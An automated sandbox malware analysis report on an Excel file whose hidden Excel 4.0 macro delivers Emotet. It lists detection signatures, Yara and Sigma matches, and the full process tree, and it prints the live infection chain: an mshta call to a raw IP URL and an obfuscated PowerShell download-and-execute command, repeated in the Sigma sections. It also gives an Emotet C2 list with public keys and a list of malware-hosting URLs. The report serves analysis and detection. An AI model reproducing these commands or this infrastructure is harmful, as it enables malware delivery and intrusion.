Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CJ68000754184.xls

Overview

General Information

Sample Name:CJ68000754184.xls
Analysis ID:562418
MD5:84edef677d286111cb0ef9d53e0d51df
SHA1:19548ae67f6ffec8a1c2cb9b768cb1e64d29dbcb
SHA256:081b5ea7f6d4ce96c9c97811785f86a68809a51eaadba0928406f562ec8ea58a
Tags:SilentBuilderxls
Infos:

Detection

Hidden Macro 4.0 Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Antivirus detection for URL or domain
Found malicious Excel 4.0 Macro
Found malware configuration
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Emotet
Multi AV Scanner detection for domain / URL
Sigma detected: Windows Shell File Write to Suspicious Folder
Document contains OLE streams with names of living off the land binaries
Powershell drops PE file
Sigma detected: MSHTA Spawning Windows Shell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Sigma detected: Suspicious MSHTA Process Patterns
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Suspicious PowerShell Command Line
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Sigma detected: Mshta Spawning Windows Shell
C2 URLs / IPs found in malware configuration
Drops PE files to the application program directory (C:\ProgramData)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Document misses a certain OLE stream usually present in this Microsoft Office document type
Abnormal high CPU Usage
Found a hidden Excel 4.0 Macro sheet
Potential document exploit detected (unknown TCP traffic)
Searches for the Microsoft Outlook file path
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found large amount of non-executed APIs
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to delete services
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Potential document exploit detected (performs DNS queries)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Enables debug privileges
PE file contains an invalid checksum
Yara detected Xls With Macro 4.0
Connects to several IPs in different countries
Potential key logger detected (key state polling based)
Creates a window with clipboard capturing capabilities
Document contains embedded VBA macros
Potential document exploit detected (performs HTTP gets)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2792 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • cmd.exe (PID: 2916 cmdline: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • mshta.exe (PID: 2812 cmdline: mshta http://91.240.118.172/gg/ff/fe.html MD5: 95828D670CFD3B16EE188168E083C3C5)
        • powershell.exe (PID: 2408 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X MD5: 852D67A27E454BD389FA7F02A8CBE23F)
          • cmd.exe (PID: 2712 cmdline: "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
            • rundll32.exe (PID: 2552 cmdline: C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq MD5: 51138BEEA3E2C21EC44D0932C71762A8)
              • rundll32.exe (PID: 2196 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                • rundll32.exe (PID: 2240 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                  • rundll32.exe (PID: 2032 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                    • rundll32.exe (PID: 1068 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs MD5: 51138BEEA3E2C21EC44D0932C71762A8)
                      • rundll32.exe (PID: 2076 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer MD5: 51138BEEA3E2C21EC44D0932C71762A8)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["160.16.102.168:80", "131.100.24.231:80", "200.17.134.35:7080", "207.38.84.195:8080", "212.237.56.116:7080", "58.227.42.236:80", "104.251.214.46:8080", "158.69.222.101:443", "192.254.71.210:443", "46.55.222.11:443", "45.118.135.203:7080", "107.182.225.142:8080", "103.75.201.2:443", "104.168.155.129:8080", "195.154.133.20:443", "159.8.59.82:8080", "110.232.117.186:8080", "45.142.114.231:8080", "41.76.108.46:8080", "203.114.109.124:443", "50.116.54.215:443", "209.59.138.75:7080", "185.157.82.211:8080", "164.68.99.3:8080", "162.214.50.39:7080", "138.185.72.26:8080", "178.63.25.185:443", "51.15.4.22:443", "81.0.236.90:443", "216.158.226.206:443", "45.176.232.124:443", "162.243.175.63:443", "212.237.17.99:8080", "45.118.115.99:8080", "129.232.188.93:443", "173.214.173.220:8080", "178.79.147.66:8080", "176.104.106.96:8080", "51.38.71.0:443", "173.212.193.249:8080", "217.182.143.207:443", "212.24.98.99:8080", "159.89.230.105:443", "79.172.212.216:8080", "212.237.5.209:443"], "Public Key": ["RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2", "RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5"]}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
CJ68000754184.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x12ca2:$s1: Excel
  • 0x13d08:$s1: Excel
  • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
CJ68000754184.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\Desktop\CJ68000754184.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
    • 0x0:$header_docf: D0 CF 11 E0
    • 0x12ca2:$s1: Excel
    • 0x13d08:$s1: Excel
    • 0x32a6:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
    C:\Users\user\Desktop\CJ68000754184.xlsJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security
      C:\ProgramData\JooSee.dllJoeSecurity_Emotet_1Yara detected EmotetJoe Security

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000000F.00000002.679498941.0000000002E40000.00000040.00000001.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          0000000D.00000002.620421483.0000000002651000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            0000000F.00000002.679023916.00000000004B1000.00000020.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              0000000D.00000002.620926031.00000000030E0000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                0000000E.00000002.623757227.0000000010001000.00000020.00000001.01000000.0000000D.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  Click to see the 47 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  10.2.rundll32.exe.340000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    12.2.rundll32.exe.1b0000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      13.2.rundll32.exe.1b0000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                        15.2.rundll32.exe.4b0000.3.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                          10.2.rundll32.exe.2410000.8.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                            Click to see the 70 entries

                            Sigma Overview

                            System Summary

                            barindex
                            Sigma detected: Windows Shell File Write to Suspicious Folder
                            Source: File createdAuthor: Florian Roth: Data: EventID: 11, Image: C:\Windows\System32\mshta.exe, ProcessId: 2812, TargetFilename: C:\Users\user\AppData\Local
                            Sigma detected: MSHTA Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2812, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2408
                            Sigma detected: Suspicious MSHTA Process Patterns
                            Source: Process startedAuthor: Florian Roth: Data: Command: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: m, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2916, ProcessCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2812
                            Sigma detected: Microsoft Office Product Spawning Windows Shell
                            Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2792, ProcessCommandLine: CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html, ProcessId: 2916
                            Sigma detected: Suspicious PowerShell Command Line
                            Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2812, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2408
                            Sigma detected: Mshta Spawning Windows Shell
                            Source: Process startedAuthor: Florian Roth: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2812, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2408
                            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , CommandLine|base64offset|contains: z+, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta http://91.240.118.172/gg/ff/fe.html, ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 2812, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X , ProcessId: 2408

                            Jbx Signature Overview

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Antivirus detection for URL or domain
                            Source: http://maxtdeveloper.com/okw9yx/Avira URL Cloud: Label: malware
                            Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/Avira URL Cloud: Label: malware
                            Source: http://it-o.biz/bitrix/xoDdDe/PE3Avira URL Cloud: Label: malware
                            Source: http://www.inablr.com/elenctic/fAvira URL Cloud: Label: malware
                            Source: http://totalplaytuxtla.com/sitio/DgktL3zd/PE3Avira URL Cloud: Label: malware
                            Source: http://hostfeeling.com/wp-admin/Avira URL Cloud: Label: malware
                            Source: http://gardeningfilm.com/wp-content/pcMVUYDQ3q/PE3Avira URL Cloud: Label: malware
                            Source: https://property-eg.com/mlzkir/97v/Avira URL Cloud: Label: malware
                            Source: http://91.240.118.172/gg/ff/fe.pngAvira URL Cloud: Label: malware
                            Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/PE3Avira URL Cloud: Label: malware
                            Source: http://bimesarayenovin.ir/wp-admAvira URL Cloud: Label: malware
                            Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/Avira URL Cloud: Label: malware
                            Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/Avira URL Cloud: Label: malware
                            Source: http://hostfeeling.comAvira URL Cloud: Label: malware
                            Source: http://daisy.sukoburu-secure.comAvira URL Cloud: Label: malware
                            Source: http://jurnalpjf.lan.go.id/assets/iM/Avira URL Cloud: Label: malware
                            Source: http://activetraining.sytes.net/Avira URL Cloud: Label: malware
                            Source: http://www.inablr.com/elenctic/fMFtRrbsEX1gXu3Z1M/PE3Avira URL Cloud: Label: malware
                            Source: https://gudangtasorichina.com/wp-content/GG01c/PE3Avira URL Cloud: Label: malware
                            Source: http://hostfeeling.com/wp-admin/4XsjtOT7cFHvBV3HZ/PE3Avira URL Cloud: Label: malware
                            Source: https://property-eg.com/mlzkir/97v/PE3Avira URL Cloud: Label: malware
                            Source: http://daisy.sukoburu-secure.com/8plks/v8lyZTe/Avira URL Cloud: Label: malware
                            Source: https://property-eg.com/mlzkir/9Avira URL Cloud: Label: malware
                            Source: http://activetraining.sytes.net/libraries/8s/PE3Avira URL Cloud: Label: malware
                            Source: http://maxtdeveloper.com/okw9yx/Gc28ZX/Avira URL Cloud: Label: malware
                            Source: http://it-o.biz/bitrix/xoDdDe/Avira URL Cloud: Label: malware
                            Source: https://gudangtasorichina.com/wp-content/GG01c/Avira URL Cloud: Label: malware
                            Source: http://totalplaytuxtla.com/sitio/DgktL3zd/Avira URL Cloud: Label: malware
                            Source: http://activetraining.sytes.net/libraries/8s/Avira URL Cloud: Label: malware
                            Source: http://gardeningfilm.com/wp-contAvira URL Cloud: Label: malware
                            Source: http://jurnalpjf.lan.go.id/assets/iM/PE3Avira URL Cloud: Label: malware
